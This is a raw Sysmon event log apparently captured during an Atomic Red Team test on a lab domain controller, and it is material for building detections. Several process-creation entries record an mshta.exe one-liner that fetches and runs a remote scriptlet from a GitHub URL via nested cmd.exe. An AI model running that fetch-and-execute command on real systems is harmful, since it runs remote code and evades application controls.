+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203616Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203615Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203614Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-99F1-603E-7907-00000000AD01}3080348C:\Windows\system32\csrss.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203613Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203612Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-E9C3-6040-544E-00000000AD01}69564732C:\Windows\system32\cmd.exe{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\system32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203611Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.686{5ABCFE62-E9C3-6040-554E-00000000AD01}436C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEmshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close() C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{5ABCFE62-E9C3-6040-544E-00000000AD01}6956C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()" 10341000x80000000000000002203610Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9C3-6040-544E-00000000AD01}6956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203609Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203608Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203607Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203606Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203605Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-99F1-603E-7907-00000000AD01}30803060C:\Windows\system32\csrss.exe{5ABCFE62-E9C3-6040-544E-00000000AD01}6956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203604Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-E9C3-6040-534E-00000000AD01}71646332C:\Windows\system32\cmd.exe{5ABCFE62-E9C3-6040-544E-00000000AD01}6956C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002203603Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.681{5ABCFE62-E9C3-6040-544E-00000000AD01}6956C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5ABCFE62-E9C3-6040-534E-00000000AD01}7164C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"" 10341000x80000000000000002203602Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-D502-6040-CE4B-00000000AD01}13763992C:\Windows\system32\conhost.exe{5ABCFE62-E9C3-6040-534E-00000000AD01}7164C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203601Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C3-6040-534E-00000000AD01}7164C:\Windows\system32\cmd.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b42a7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b452d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\a179960d666c10cfe020612d369c7500\System.ni.dll+2b3ed3|UNKNOWN(00007FF8172E9FF3) 10341000x80000000000000002203600Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203599Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203598Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.674{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203597Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.659{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203596Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.659{5ABCFE62-99F1-603E-7907-00000000AD01}30806064C:\Windows\system32\csrss.exe{5ABCFE62-E9C3-6040-534E-00000000AD01}7164C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002203595Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.659{5ABCFE62-D502-6040-CD4B-00000000AD01}67326356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5ABCFE62-E9C3-6040-534E-00000000AD01}7164C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\cfd860010e09697c026b70ae44e2d030\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f3743(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f35b7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c675de3(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5ec19f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5d0a5392(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5b4997(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c612e66(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f64cb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5f635c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c5e82e1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\dd36727cff7bcfbb59917492bccadad8\System.Management.Automation.ni.dll+5c621471(wow64) 154100x80000000000000002203594Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.673{5ABCFE62-E9C3-6040-534E-00000000AD01}7164C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.001/src/mshta.sct').Exec();close()"" C:\Users\ADMINI~1\AppData\Local\Temp\2\ATTACKRANGE\Administrator{5ABCFE62-99F3-603E-CE9A-500000000000}0x509ace2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x80000000000000002203593Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.659{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-err.txt2021-03-04 14:07:47.393 11241100x80000000000000002203592Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.659{5ABCFE62-D502-6040-CD4B-00000000AD01}6732C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\art-out.txt2021-03-04 14:07:47.393 23542300x80000000000000002203591Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.565{5ABCFE62-E9C3-6040-514E-00000000AD01}3816ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203590Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.424{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2A2A1DF9988089EAA2CA8FE84227F68,SHA256=158B54AF0B3602B323FAF3A15FB92BDBCF74D12737E63B8715BC3A3E0CBFB195,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203589Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:03.409{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E9C3-6040-524E-00000000AD01}4416C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002203588Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 